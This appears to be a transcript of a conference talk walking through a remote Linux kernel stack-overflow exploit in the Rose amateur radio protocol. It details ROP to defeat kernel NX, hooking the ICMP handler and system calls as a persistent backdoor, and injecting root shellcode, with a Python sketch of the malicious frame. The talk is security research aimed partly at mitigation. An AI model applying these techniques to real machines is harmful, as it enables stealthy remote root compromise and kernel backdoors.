Thanks everybody for coming despite the late hour. This is "Owned Over Amateur Radio," and we're going to be talking about remote kernel exploitation. First a little bit about me. My name's Dan. I am a security consultant at VSR in Boston, mostly doing app and network pen testing, code review, that sort of thing. I've published a few bugs. Mostly I focus lately on the Linux kernel and especially on Linux kernel exploitation and mitigation. So what are we going to talk about today? First I was going to provide some motivation on why I wanted to give this talk and what I hope you guys will get out of it. And next we'll just dive right into some of the technical details of what are some of the challenges associated with developing fully working remote kernel exploits. Next we'll take a look at what some of the past work has been in remote kernel exploitation and try to draw some trends there and look at areas that haven't been covered as much. And then we'll get into the body of the talk, which is sort of a case study of an exploit that I wrote for a remote stack overflow in the Linux kernel's implementation of the Rose amateur radio protocol. And this part of the talk will be in sort of two phases. In the first phase I'll sort of explain exploitation of the vulnerability. And in the second phase I'll explain the details of the kernel backdoor that I installed during the exploitation phase. And then finally we'll wrap up by taking a look at some future work. I think remote kernel exploits sort of speak for themselves as to why they're useful. It's sort of this keys-to-the-kingdom concept where you have instant remote root access to a machine that you previously had no interaction with. But especially when you compare them with the challenges that are facing you when you're trying to exploit client-side systems, like browsers, for example. If you have a browser exploit, you're frequently facing exploit mitigation technologies like ASLR and NX or DEP.
And sometimes those require the existence of a second vulnerability to bypass. And at that point you may be running inside a browser sandbox, for example, as IE9 and Chrome and most recently Safari now provide. So if you can leverage a third vulnerability to escape that sandbox, you may need to escalate privileges using a fourth vulnerability because you're running as an unprivileged user. And that seems like a lot of pain, so I'd prefer to skip all that. What I hope you guys will get out of this talk: this is not actually an amateur radio talk, despite the really misleading title. We're going to talk about enough of amateur radio to understand the vulnerability that I'm using. But really this is sort of a vehicle for me to talk about exploit development methodology. So if you guys don't have any experience writing exploits, you'll hopefully get a sense of what are some of the building blocks that we can use to exploit these kinds of vulnerabilities? What are some of the steps that we need to go through? And I'll also be showing off a bunch of sort of exploitation techniques, which I think is far more interesting and useful than doing a study of an individual bug, because bugs come and go, they get fixed all the time, but exploit techniques, and learning how to mitigate them, really apply across lots of bugs. And sort of the whole point of this is to take a look at this exploit and identify what the weak links in the chain are, what are the parts of the exploit that aren't really done so well, so that we can identify what are the easiest ways to protect against these kinds of exploits. So despite their advantages, remote kernel exploits are not trivial, right? And I've sort of identified three key points as to why there are some extra challenges associated with these kinds of exploits. The first of these is that the environment that you're working in is incredibly fragile.
If you're dealing with a remote userland exploit, for example, like a web server or an FTP server or something like that, frequently if you fail, if you're dealing with some sort of memory corruption vulnerability and you miscalculate some offsets or your exploit fails for some other reason, frequently you'll crash the application or service. In some cases it needs to be restarted manually and in others it'll be restarted automatically. If you're dealing with a service that actually forks child processes for each connection, you may not even crash the service itself, you'll just crash the child process, and you essentially have very minimal consequences for failure and you can continue to try to exploit it. In contrast, if you fail at a remote kernel exploit, in nearly every case, the kernel's going to panic and the box will fall over. And not only will you have lost your chance to exploit that machine, but you've lost any chance of doing so with any sense of stealth. It's a little bit noisy to crash an entire machine. The second main obstacle, in my opinion, for these kinds of exploits is that you have very little control over the environment that you're trying to exploit. And this is sort of a shared property of all remote exploits. If you're dealing with a local kernel exploit where you have an unprivileged account on the machine, you have a lot of sort of exploit primitives, sort of building blocks that you can use to make writing exploits easier. For example, it's very easy to trigger the allocation of data structures on the kernel heap. You can open files or sockets or create shared memory segments. And all of these resources have structures on the kernel heap. And you can sort of trigger these allocations in such a way as to massage the heap into a state that's conducive to exploitation. Likewise, you can trigger the calling of function pointers in the kernel by performing operations on these structures that you've allocated.
And finally, there's this huge silver platter of information the kernel gives you if you're a local user through interfaces like, on Linux, the proc file system, that will really help you find out where things are in kernel memory and help target your attacks. If you're dealing with a remote kernel exploit, you don't actually have any of those capabilities right away. But we may see how you can sort of build them up from other exploitation primitives you might have. And the final challenge, in my opinion, with writing these exploits, is they frequently occur in what's known as interrupt context. So 10-second operating system 101: when a process makes a system call, it is executing kernel code in what's known as process context, where the thread of execution has a userland application, a process, associated with it. But in contrast, when you're dealing with asynchronous events, like receiving networking data, the kernel is running in what's known as interrupt context. It doesn't have a process associated with that thread of execution. And this is a very sort of delicate and difficult context to exploit, because the end goal here is usually to execute code in userland, because a shell is a really nice, convenient way to interact with the system, and that's sort of what everybody wants. So the challenge is, how do we get from this sort of hostile, interrupt context environment to executing code in userland? And the answer is we need to find a way to transition from interrupt context to kernel mode process context, in which we're still running kernel code, but we now have a process associated with us, and then finally from there to actually executing code in userland. So before I get into what I did, I thought it would be prudent to talk about what's been done before. So I studied, I looked up and researched every remote kernel exploit I could find anywhere. And I identified 18 exploits that have been talked about or published for 16 unique vulnerabilities.
These were written by 19 people, nine of them have full public source code, many of them Metasploit modules, three of them have sort of partial or proof of concept source code, and the rest were sort of discussed in detail at conferences without code. And these exploits cover a wide range of platforms. Solaris and OS X have not had any weaponized remote kernel exploits. That's sort of future work, if you're into that sort of thing. Breaking these down by what operating systems they affect, half of the 16 vulnerabilities were in Windows, only four of those were actually in the Windows core components, three of them were in various wireless drivers and one was in a Symantec firewall, three in NetWare, which I don't think anyone still uses, three in various BSDs and two in Linux, one of which was in a third party driver. And breaking these down by vulnerability class as to what vulnerability was exploited, a full three quarters of these, 12 of the 16, were typical stack overflows. And I think this is probably because these vulnerabilities are incredibly conducive to exploitation, they're very well understood, the steps of exploiting them are known. Three of these vulnerabilities were heap overflows, which are frequently much more difficult, and then one of these, a Windows SMB issue, is actually an array indexing issue. I'm not sure there's actually enough data to draw meaningful conclusions about trends here, but 2007 was a busy year for kernel exploitation. So just a brief walkthrough of some of what are, in my opinion, the highlights of past work on remote kernel exploits. Barnaby Jack did the first work that I'm aware of, he started in 2004, 2005, and he exploited a remote stack overflow in a Symantec firewall application. And he demonstrated a lot of really cool things, especially detailed shellcode examples for how to transition from running in the kernel to actually executing userland code.
And he also demonstrated a kernel backdoor that in many ways was sort of an inspiration for the one I ended up implementing. Next in 2006, Sinan Eren from Immunity announced that they had Green Apple, which was a remote kernel exploit for Windows. And that's sort of the first commercially available remote kernel exploit that I'm aware of. Also in 2006, HD Moore, Matt Miller, and Johnny Cache published three remote kernel exploits in various Wi-Fi drivers that were all added to Metasploit. In 2007, there was an OpenBSD IPv6 vulnerability, which was really awesome. That was the first public remote kernel heap overflow that I'm aware of. They did some nice work on that. And they also bypassed userland NX protection, as in a non-executable stack, heap, et cetera. Final highlights: Immunity has a CANVAS exploit for MS08-001, which is a Windows IGMPv3 vulnerability. And that was a really difficult to exploit Windows kernel pool overflow that people were questioning whether it was exploitable before they announced that they had a reliable exploit. And then finally, in 2009, sgrakkyu published an exploit for a Linux kernel vulnerability in the SCTP protocol, which is a remote Linux heap overflow. And I think one of the great contributions from this exploit is he introduced a really neat trick that leverages an AMD64-specific page mapping to easily transition from interrupt context to executing code directly in userland. Just sort of drawing some trends from all this work I did reading up on what's been done before. Three quarters of these issues were stack overflows, but none of these actually had to contend with having non-executable stacks in the kernel itself, because the feature wasn't introduced at that point. So my exploit will try to address that. Next, neither of the two issues on Linux was actually a stack overflow in interrupt context, which is sort of a particularly difficult context to exploit things in, because you need to do a bunch of cleanup.
sgrakkyu and twiz published an article in Phrack 64 called Kernel Exploiting Notes, or something to that effect, and they sort of described the steps you need to go through to do this, but it was for a vulnerability introduced for the sake of demonstration, and I wanted to provide a real-life example. And the last observation is that six of the 18 exploits were for issues in 802.11 code. So I think wireless drivers could probably use some improvement. And now we've gotten to the good stuff. Before we start talking about how to write this exploit or what the bug is, the target system that I'm going after: I'm using a 32-bit x86 physical address extension (PAE) kernel, and the PAE component is significant because it means the kernel now has NX support, as in the kernel stacks and kernel heap, kernel data are all now non-executable, so we can't just execute code on the kernel stack immediately without doing something first. These kernels have userland NX protection as well, so if we're going to somehow introduce code into a user process, we also need to do so in a way that honors page permissions. We can't execute code on a userland stack without modifying its permissions. And then finally, because we're on a 32-bit machine, we can't leverage sgrakkyu's trick that was specific to AMD64 to make that transition from interrupt context to userland. For actually doing testing, I just had two VMs, I chose Ubuntu 10.04. The attacker is just a desktop machine, the victim is Ubuntu Server because that's a PAE build. For debugging, I just used KGDB, and for the actual networking, I was not sitting in my apartment with radio equipment driving my girlfriend crazy. I was using BPQ, which is an implementation of AX.25 amateur radio over Ethernet, so my VMs can talk to each other without me needing to buy radio hardware or get a license.
And just because of the nature of the exploit, it's written entirely in x86 assembly except for the code that sort of ties it all together and sends it over the wire. So this is the advisory that Debian put out for the vulnerability that I'm gonna be exploiting. Dan Rosenberg: first, they spelled my name wrong. They spelled it right in actually five other issues in the same advisory, got it wrong in this one, which is some sort of sign. Reported two issues in the Linux implementation of the amateur radio X.25 PLP (Rose) protocol. A remote user can cause a denial of service by providing specially crafted facilities fields. And this is a pretty interesting denial of service. So just a brief overview of the protocol we're gonna be exploiting, just enough detail so you understand the vulnerability that I'll be taking advantage of. Rose is a fairly rarely used amateur radio protocol and it's a network layer that sits on top of AX.25, which is sort of a more commonly used packet radio protocol. So in addition to their seven-byte AX.25 addresses, Rose nodes have 10-digit numeric addresses to identify them. And it supports only static routing, and it does so using a digipeater mechanism where a host can essentially say, all right, I'll accept packets from this AX.25 call sign and forward them along to this one. So when two hosts issue a connection to each other using Rose, they exchange what are known as facilities. And this is sort of just a list of supported features for that connection. And one of these facilities, FAC_NATIONAL_DIGIS, allows one host to give the other host a list of digipeaters just so it can figure out its routing stuff. And in the Linux kernel implementation, I noticed that when they went to parse this particular field in the Rose frame, they read this length value directly from the frame and copied all this digipeater data without any bounds checking into a statically sized buffer on the kernel stack. And this is the sad code.
You can see at the top line, they're just reading that length value right out of the frame data, using it as an upper bound for this loop that then copies data in in AX.25-address-sized chunks, which are seven bytes, into either the destination or source array. And those arrays are living on the stack. You may also notice that there's a constraint here. The seventh byte of every AX.25 address is actually ANDed with a flag that indicates whether it's a source or destination digipeater. And that means in our payload, we need to obey that constraint. Every seventh byte needs to be consistently greater than or less than 0x80. Otherwise, one seven-byte chunk might be copied into one array and then the next one might be copied into a different array, and it would be very difficult to handle and it would be a pain. So this sort of just required me to go through the exploit and manually check that this constraint was satisfied. So now we've got a plan of attack. We've got a vulnerability and we want to actually exploit it. The first step is to actually gain control of the instruction pointer so we can control what the kernel's gonna do. And from that point, we need to actually start executing code. Next, I decided that my exploit would install a remotely triggerable kernel backdoor, because that sounded like fun. And finally, we will have to do some cleanup to make everything keep running. So first, triggering the bug was actually really the easy part. It took 10 minutes after I found it. What I did was essentially cannibalize the rose kernel module that already existed so that whenever I made a connection to someone, it would send out my evil rose frame instead of a normal one. And this evil rose frame just had this particular facility field that was vulnerable, followed by a too-big length value and then a bunch of no-op instructions, just for the sake of testing to see if I could actually trigger it. This is what the frame looks like.
You have your header, total facilities length, which didn't actually matter, a null byte, FAC_NATIONAL, which is the specific class of facility, FAC_NATIONAL_DIGIS, which is the vulnerable facility itself, and then this length value, which we're setting to 0xFF, which is 255, which is more than enough to cause the overflow, and then a bunch of 0x90s. And so you recompile your rose module and then you make a connection to your vulnerable host, and it causes a stack overflow on the softirq stack, which is where the interrupt handler that's receiving this data runs. You can see in the debugger on our host, we've overwritten the saved return address on the stack, and then when that vulnerable function returned, it returned to 0x90909090, which is the value that we put there. So now we control the instruction pointer. As most people who've written serious exploits know, getting control of the instruction pointer and actually executing code can be separated by a lot of work. Traditionally, if it were like 1995, we would just sort of return into shellcode that was stored in our buffer that was copied onto the stack, and then we'd be running code and that's all you need to do. The first problem is we don't actually know where the softirq stack lives in memory because it's allocated at runtime and it's gonna be different on each boot. That's pretty easily solvable. You just sort of return to this trampoline function that will do like a jmp esp and jump into the stack wherever it is. The second problem though is that since we're running a PAE kernel, the softirq stack on which we caused our overflow is non-executable memory. So if we try to return there, the kernel will just crash. And this means we need to employ return-oriented programming.
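Before moving on to ROP, here's a rough Python model of the malicious facility field and the unchecked copy loop we just walked through. The facility code bytes are placeholders (the real values live in the kernel's net/rose sources), and the fixed stack arrays are simplified into lists, so treat this as a sketch of the logic, not the kernel's actual code:

```python
AX25_ADDR_LEN = 7    # one AX.25 address is seven bytes
AX25_HBIT = 0x80     # flag bit in the seventh byte: dest vs. source digipeater

def build_evil_facilities(overflow_len=0xFF, nop=0x90):
    # Sketch of the malicious field: null byte, facility class byte,
    # the vulnerable facility byte, the oversized length, then payload.
    # The two facility code bytes below are placeholders, not the kernel's
    # real FAC_NATIONAL / FAC_NATIONAL_DIGIS values.
    FAC_NATIONAL, FAC_NATIONAL_DIGIS = 0x00, 0x00
    # 0x90 already has the high bit set, so every chunk obeys the
    # "seventh byte consistently >= 0x80" constraint and lands in one array.
    addr = bytes([nop] * 6 + [nop | AX25_HBIT])
    payload = addr * (overflow_len // AX25_ADDR_LEN)
    return bytes([0x00, FAC_NATIONAL, FAC_NATIONAL_DIGIS, overflow_len]) + payload

def parse_national_digis(field):
    # Model of the vulnerable loop: the length byte comes straight from
    # the frame and is never checked against the size of the arrays.
    length = field[3]                  # attacker-controlled
    dest, source = [], []              # stand-ins for the fixed stack arrays
    for off in range(4, 4 + length, AX25_ADDR_LEN):
        addr = field[off:off + AX25_ADDR_LEN]
        if len(addr) < AX25_ADDR_LEN:  # simplification: stop at end of data
            break
        if addr[6] & AX25_HBIT:        # seventh byte picks the array
            dest.append(addr)
        else:
            source.append(addr)
    return dest, source

field = build_evil_facilities()
dest, source = parse_national_digis(field)
assert len(dest) == 36 and len(source) == 0   # far more than the arrays hold
```

The point is that the length byte in the frame, not the capacity of the stack arrays, bounds the loop, and that keeping the seventh byte's flag bit consistent keeps every chunk flowing into the same array.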
So the basic idea of return-oriented programming is, because we've caused our stack overflow, we now control the return address where this function's going to go after it's finished doing whatever it's doing, and we control a bunch of data on the stack past that saved return address. And we also notice that every return instruction will direct execution to the address that's on the stack and then increment the stack pointer to the next place. So using this, we can actually just chain together little pieces of code at known locations in the kernel to do essentially arbitrary computation. I say at known locations because this actually does rely on the fact that you know where stuff is in memory. And this is a fairly reasonable assumption in the kernel world. If you're running a distribution kernel like Ubuntu or Debian or Fedora, they're shipping binary kernels, which means everyone with the latest version of Ubuntu has the same kernel image in memory in terms of the code. So it's fairly reasonable to assume that if you know something about your target, then you essentially know where in memory certain instructions live. And there's no sort of randomization of the kernel at all. To make this a little bit better, you can actually choose these gadgets, these little pieces of code that you're executing, in such a way that they're more likely to appear across multiple kernel builds. So now actually looking at some code. What we want our ROP payload to do is to actually make the stack that we overflowed executable so that we can run code on it. And the kernel has a really nice convenient function that'll take care of all the hard work for us called set_memory_x. And set_memory_x just takes two arguments. The first one is an address that you want to mark executable. And the second one is the number of pages from that point that you want to mark.
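As a quick model of the two arguments we need to stage for that call (the stack pointer value here is made up for illustration):

```python
PAGE_SIZE = 0x1000

def page_align(addr):
    # set_memory_x wants its first argument on a page boundary
    return addr & ~(PAGE_SIZE - 1)

def set_memory_x_args(stack_ptr, npages=4):
    """Model of the arguments staged for set_memory_x: a page-aligned
    address and a page count (four pages, as chosen in the talk)."""
    return (page_align(stack_ptr), npages)

# Hypothetical softirq stack pointer; any address in the stack works,
# because we only care about the page(s) it sits on.
addr, pages = set_memory_x_args(0xDF8051A4)
assert addr == 0xDF805000 and pages == 4
```

In the actual ROP stub, these two values end up in the argument registers before returning into set_memory_x.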
So we're in the kernel, so the calling convention actually has the first three arguments to functions in registers. So we just need to keep that in mind. So what the ROP stub does is first, we actually want to load the stack pointer, which points into the stack that we want to mark executable, into the EAX register, because that's the first argument register for this function. We'll actually align it to a page boundary, because set_memory_x will cry a little bit if you don't have things page aligned. Then I just chose arbitrarily, let's mark four pages from that point, into our second argument register, which is EDX. Return into set_memory_x, which is just gonna mark the softirq stack executable. And from that point, we can just return into a jmp esp instruction, at which point execution will jump into the softirq stack and start running our code. So at this point, we are running shellcode on the softirq stack in kernel mode, great. But we've got a problem. The amount of data that we could have copied into our overflowed region is limited to 255 bytes just by nature of the particular bug that we're exploiting. And we've already used a whole bunch of that to get up to the saved return address. We've used more for our ROP payload. So we're running very low on space, and kernel payloads can be quite big. So we really need to overcome that space constraint. But it's useful to keep in mind that that's just the part of the packet that got copied into the overflow region. We have this rose frame that we sent that can be thousands of bytes big living somewhere on the kernel heap. And I found experimentally that one of the parent functions to the function where we caused the overflow actually has a pointer to this rose frame, the entire rose packet that we sent over. So what we can do is, now that we're executing code, all we need to do is walk up the stack and say, is this a kernel pointer? Yes, no, just heuristically.
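That heuristic is cheap because of how the 32-bit address space is carved up. A sketch, assuming the default 3G/1G userspace/kernel split:

```python
def looks_like_kernel_pointer(val):
    """On 32-bit x86 with the default 3G/1G split, kernel virtual
    addresses live above 0xc0000000, so anything in that range is a
    plausible kernel pointer worth following."""
    return 0xC0000000 <= val <= 0xFFFFFFFF

# A heap or stack address in kernel space passes the check...
assert looks_like_kernel_pointer(0xDF805000)
# ...while userland addresses and small integers on the stack do not.
assert not looks_like_kernel_pointer(0x0804F000)
assert not looks_like_kernel_pointer(255)
```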
And if it is, you can follow it and look around in memory, and we'll put a tag in our rose frame so that we can find it. And then we'll eventually just find our rose frame on the kernel heap, we'll mark it executable just by calling set_memory_x, and then jump into it. So now we've overcome our space constraint. We can execute arbitrary length payloads running in kernel mode right now. And the goal here is I want to install a kernel backdoor in the ICMP handler, because it's badass. So just some data structures to sort of explain what I had to do here. It's not very complicated. There's this sort of global array at a known location, because it's in kernel data, called the inet_protos array. And this is just an array of pointers to these net_protocol structures. There's one for sort of each IP protocol: there's a TCP one, there's UDP, ICMP. And the first member of this net_protocol structure is a handler function pointer, and that's what gets called when the kernel receives data for that protocol. So if we can overwrite that function pointer for the ICMP protocol, then whenever we receive ICMP data, it will call into our code and we can move on from there. So hooking ICMP is pretty straightforward. I decided to use the softirq stack itself as a place to sort of put stuff just for the exploit, because we've already marked it executable, so it's a good place to put code that we're gonna need later. It's persistent. It's not gonna go away while the kernel's running. And it's a very safe place, because on Linux, kernel stacks are eight kilobytes big by default, but the bottom four kilobytes is guaranteed to never be written into. Otherwise, the optional four kilobyte stack configuration would never work. So anything in the bottom four kilobytes of the softirq stack, outside of the metadata at the very bottom of it, is a great place to store stuff.
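As a miniature model of that hooking scheme, with a Python dict standing in for the inet_protos array and closures standing in for the handler pointers (all names here are illustrative):

```python
# Toy model of the inet_protos dispatch: protocol number -> handler,
# like the kernel's array of pointers to net_protocol structures.
IPPROTO_ICMP = 1

def icmp_rcv(pkt):              # stand-in for the kernel's real ICMP handler
    return "icmp:" + pkt

inet_protos = {IPPROTO_ICMP: icmp_rcv}

def make_hook(original):
    def hook(pkt):
        hook.seen.append(pkt)   # "our code runs first"...
        return original(pkt)    # ...then we chain to the real handler
    hook.seen = []
    return hook

def install_hook(table, proto):
    """Overwrite the handler pointer, keeping the original around so
    the hook can chain to it."""
    table[proto] = make_hook(table[proto])

install_hook(inet_protos, IPPROTO_ICMP)
assert inet_protos[IPPROTO_ICMP]("ping") == "icmp:ping"   # ping still works
assert inet_protos[IPPROTO_ICMP].seen == ["ping"]         # but we saw it first
```

The important property is that the hook keeps the original handler pointer around so it can chain to it, which is exactly why ping keeps working after the real hook is installed.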
So what we do is we copy our hook (we'll explain what that does in the second part, when I describe the backdoor, but for now it's just some code that we wanna run) into the softirq stack just for safekeeping. And then we wanna actually install a hook so that execution will be redirected to it. First, we notice that the handler that I wanna overwrite is in read-only memory, which is sort of a pain. x86 has a nice little way out for this. Control register zero (CR0) has a bit called the write protect bit. And if you flip this bit, then you can essentially write into read-only memory with no problem. Which comes in handy. So what we do is we flip this bit. Now we can write into read-only memory. We write the address of this hook that we just copied in into the ICMP handler function pointer. And then it looks something like this. Wow, those are really narrow arrows, I guess. So whenever our kernel receives ICMP data, it will call that handler function pointer, and execution will go to this hook that we installed. It'll run whatever code we choose to run there. And then presumably when we're done, we're gonna call the original ICMP function so that ping still works and stuff like that. Finally, the last phase of this exploitation component is to actually make sure that the kernel keeps running, because all this work is sort of for nothing if you do it and then the kernel just collapses. So the biggest problem here is that we've wiped out a pretty big portion of the stack by causing this overflow. And if we don't do any cleanup, then the kernel is just gonna crash. The first bit of cleanup I needed to do has to do with some locks. So at the time of the exploit, the rose protocol was holding two spin locks just for mutual exclusion purposes. And if we just sort of carried on as if nothing happened, then the rose stack would actually deadlock and the kernel would lock up.
The problem here is these spin locks live inside the rose kernel module, which is loaded at runtime, so we don't actually know where it is. Fortunately, it's actually pretty easy to find it. There's this global modules variable, which is the head of a linked list of loaded kernel modules. So what we can do is we just follow this linked list until we find the module named rose, and read this sort of module structure that is hanging off this linked list until we find where the data section of the rose module is. Now that we know where the data section of this module is, we can sort of scan it for a byte pattern that represents a distinctive signature of what these spin locks look like in memory, and that's unique. So that will always work. And then once we find them we can release them by, I think it's incrementing them. The second bit of cleanup I needed to do has to do with the preemption count. So on Linux every process has this variable called preempt_count, which sort of encapsulates a bunch of information related to scheduling. And if the kernel calls an interrupt handler, as it did when our malicious rose frame was received, and returns from that interrupt handler, and the preemption count isn't what it expects it to be, then in the past the scheduler would panic and everything would fall over. More recently they put in a check where if it's not what it expects it to be, it actually just complains a little bit and fixes it for you. Which is really nice for exploitation and saved me a lot of trouble when I was first getting this up and running. But for the sake of completeness we'll avoid that warning, because we don't want anything to be logged. It's really easy to find the preemption count. It just lives in the thread_info structure, which is at the base of the kernel stack of whatever process it is.
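Finding that base is just a mask of any stack pointer within the stack. A quick model, assuming the default 8 KB kernel stacks (the stack pointer values are made up):

```python
THREAD_SIZE = 8192   # kernel stacks are 8 KB by default on 32-bit Linux

def thread_info_base(esp):
    """thread_info sits at the base of the current kernel stack, so
    masking any stack pointer down to an 8 KB boundary finds it."""
    return esp & ~(THREAD_SIZE - 1)

# Any two stack pointers within the same 8 KB stack give the same base:
assert thread_info_base(0xDF8051A4) == 0xDF804000
assert thread_info_base(0xDF8043F0) == 0xDF804000
```

From that base, preempt_count is at a known offset inside thread_info, which is why a simple decrement at a fixed offset is enough to fix it up.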
So all we need to do is, we know where the softirq stack is, we just find the base of it, and then this variable is at a known offset from that base, and we just decrement it appropriately, and that's all we need to do. Now finally we need to do the actual stack cleanup so the kernel will keep running. So recalling that stacks are sort of divided into frames, which represent function contexts essentially, our overflow has wiped out some number of frames, including all the metadata that's needed to keep things running. So what we need to do is we actually walk up the kernel stack until we match a signature that I prepared ahead of time that represents: this is a frame boundary, this is a good place for us to put the stack pointer, and everything will keep running as normal once we return from there. It's sort of as if we magically teleported up a few parent functions. So let's go over what we've done so far. And that's the end of the exploitation phase. At that point, if you send your exploit over, it installs its hook and the kernel keeps running, and you would never notice anything happening. So what we've done so far: we trigger our overflow, gain control of the instruction pointer, and then we leverage return-oriented programming to mark the softirq stack where the overflow took place executable, and then jump into a shellcode stub on the softirq stack. Next, because we have this space limitation, we find the entire rose frame on the kernel heap, mark it executable, and jump into it. Next, we install our kernel backdoor by hooking the ICMP handler, and then we do some cleanup that we need to do to keep the kernel running. Next, we're gonna talk about the backdoor. So now at this point, whenever an ICMP packet is received, our hook that we put in kernel memory is gonna run. Now we wanna talk about what that hook's gonna actually do. So the first thing it does is it checks for this sort of arbitrary magic tag that I just made up in the ICMP header.
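A toy version of that tag check and the dispatch it drives, anticipating the two packet types described next. The tag bytes and type codes here are made up, which is fine, since the real ones are arbitrary anyway:

```python
MAGIC = b"\xDE\xAD\xBE\xEF"      # made-up tag; the real one is arbitrary too
INSTALL, TRIGGER = 0x01, 0x02    # made-up packet type codes

stored_payload = {}

def backdoor_hook(icmp_data):
    """Model of the hook's dispatch: install packets stash a userland
    payload for later; trigger packets would kick off the syscall-hook
    machinery (here we just report the decision)."""
    if not icmp_data.startswith(MAGIC):
        return "pass to original handler"    # ordinary ICMP traffic
    kind = icmp_data[len(MAGIC)]
    if kind == INSTALL:
        stored_payload["code"] = icmp_data[len(MAGIC) + 1:]
        return "installed"
    if kind == TRIGGER and "code" in stored_payload:
        return "triggered"
    return "pass to original handler"

assert backdoor_hook(b"ordinary ping") == "pass to original handler"
assert backdoor_hook(MAGIC + bytes([INSTALL]) + b"\x90\x90") == "installed"
assert backdoor_hook(MAGIC + bytes([TRIGGER])) == "triggered"
```

Because the payload sits in kernel memory between packets, install and trigger can be days apart and the trigger can be repeated.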
And I decided that I wanted to have two distinct kinds of packets to handle. I wanted to have an install packet, and what I want that to do is sort of cause it to keep shellcode that I put in the ICMP packet around for later, just sort of let it sit in kernel memory somewhere. And then I wanted to have a trigger packet that causes that shellcode to execute somehow. And this is userland shellcode that I wanna be dealing with. And these packets should be able to be sent independently. So you can sort of install a payload and come back a week later and cause it to trigger repeatedly. So we need to develop a strategy for how we're gonna actually make this happen. The problem here is the ICMP handler that we've hooked is also running in interrupt context. And we wanna get to userland. We wanna execute code in userland. So in the first phase, we need to actually transition from interrupt context to kernel mode process context, where we're still running kernel code, but it now has a process associated with our execution. In the second phase, we wanna actually hijack that process that's now associated with our execution and cause it to execute our userland payload. So for the first phase, we check the magic tag when we receive an ICMP packet. And if it's an install packet, then we'll just copy the payload that's in the packet into a safe place. And we're gonna keep using the softirq stack as a good place to store stuff. If we get a trigger packet, then we need to make that transition to process context. And in my opinion, the easiest way to do so is to hook a system call, because whenever a process calls a system call, it will then be executing kernel code in process context, which is where we wanna be. How to do this, it's been done before. I find the system call table at runtime by issuing a sidt instruction, which is an x86 instruction that finds the base address of the interrupt descriptor table.
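The table-finding step that follows can be sketched as a byte-pattern scan. The three-byte opcode sequence below encodes an indirect call through a table indexed by EAX (`call *table(,%eax,4)`), which is the pattern this classic trick looks for in the int 0x80 entry code; the handler bytes and table address here are fabricated for illustration:

```python
CALL_TABLE_PATTERN = b"\xff\x14\x85"   # opcodes for "call *table(,%eax,4)"

def find_sys_call_table(handler_bytes):
    """Scan the int 0x80 entry code for the indirect call through the
    system call table; the 4 bytes after the pattern are its address."""
    idx = handler_bytes.find(CALL_TABLE_PATTERN)
    if idx < 0:
        return None
    disp = handler_bytes[idx + 3:idx + 7]
    return int.from_bytes(disp, "little")

# Fake entry code: some instructions, then call *0xc15c1000(,%eax,4).
# The table address is invented for the example.
fake_handler = b"\x90" * 6 + CALL_TABLE_PATTERN + (0xC15C1000).to_bytes(4, "little")
assert find_sys_call_table(fake_handler) == 0xC15C1000
```

Once the table address is recovered, each entry is just a function pointer indexed by system call number, which is what makes the hook in the next step a single pointer write.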
I just index into this table and pull out the handler for int 0x80, which is the system call interrupt. So that's the entry code for what happens when you make a system call. I scan this function for a byte pattern indicating it's making a call into another table, and this other table is the system call table. So you do that, and now I know where the system call table is. The system call table is essentially a table of function pointers representing the handlers for what happens when you make a system call, like open or close. The system call table on Linux is read-only, but we've already figured out how to get around that: we just flip that magic write-protect bit in CR0, and we can write to read-only memory. So what we do is save the original handler for whichever system call we wanna hook, because we're gonna need it, and write the address of our hook code into the system call table. Now whenever someone calls that system call, it'll execute our code. Because we want the ICMP stack to keep working, we also just call the original ICMP handler that we kept around, so the machine still pings. So now we wanna move on to phase two. What we've done is copy the userland payload that we eventually wanna execute into kernel memory, and some process comes along and calls the system call that we chose to hook. What we need to do now is hijack that process to execute our userland code. First of all, we're only really interested in processes that are running with root privileges. It would sort of suck if we went through all this trouble and got a connect-back shell as the nobody user. So the challenge is: how do we actually check that this random process we hijacked is a root-owned process? You could do this by following various pointers in metadata associated with that process, but each of those structures is unstable.
They change a lot between different kernel versions; you'd have to do it heuristically, and it's sort of a pain. It'd be really nice if we could just call getuid, because that's something we know and understand: a very simple interface that will immediately tell us what our user ID is. But the question is, is it possible to call system calls from kernel mode? Logically it doesn't really seem to make sense, because a system call is designed to be an interface that user applications use to request services from the kernel. So what happens when you make a system call via int 0x80 from kernel mode? I'm just curious, how many of you, if you had to guess, would think that you could do this without a problem? That's pretty good. How many of you think that some issues may arise if you try to make an int 0x80 from kernel mode? How many of you have no clue what I'm talking about? Thanks for being honest. It turns out that most system calls will work perfectly fine when you call them from the kernel. For the details of this you just need to know some x86 trivia, but basically, the problem I thought might arise has to do with the fact that when you transition from userland to kernel mode, you switch stacks to a kernel-mode stack, and I thought that might screw things up. But this stack switch only happens when you're changing privilege levels. So if you make a system call from kernel mode, you just skip the stack switch and use whatever stack is already there. This is just like any other interrupt that is intra-privilege level; there are lots of interrupts that can be taken from ring zero, and there are really no problems here. There are a few exceptions to this rule. Some system calls actually require the stack to be in a certain state, with the saved register state (the pt_regs structure) at a known location, and when you do it from kernel mode those assumptions are violated, so they won't work properly.
These are things like fork, execve, and clone, but those are things we don't really have much interest in calling from kernel mode anyway. So now, back to the actual challenge: we wanted to see if our process is owned by root. All you need to do is load the EAX register with the syscall number for getuid and make an int 0x80. It's really easy. Then you just check the return code. If it's zero, then we know our process is owned by root, and we'll carry on. If it's not zero, then we'll just send that process along and have it call the original syscall handler that we hooked, so it does whatever it was intending to do and keeps going. Next we need to actually inject our userland payload into this process that we've now hijacked. The kernel stack, as a result of that stack switch I just mentioned, actually holds the saved userland stack pointer. When the process enters kernel mode, the CPU pushes the userland stack pointer onto the kernel stack, so that when it returns from the system call, it knows where to put the stack back. So let's put our payload on the userland stack, because we can just read that pointer and know where it is. What we do is copy the userland payload that we installed earlier, as part of that install packet, from wherever we put it in kernel memory onto this process's userland stack. Because we have a modern system, the userland stack is non-executable memory, so we can't immediately execute code there, but that's easy enough to fix. We'll just call mprotect, by loading the appropriate system call number and arguments into the registers and making an int 0x80 from kernel mode, to mark the userland stack executable. Now, finally, one of the last things we need to do is make sure that when the process we're hijacking returns from the system call it's in, it runs our code.
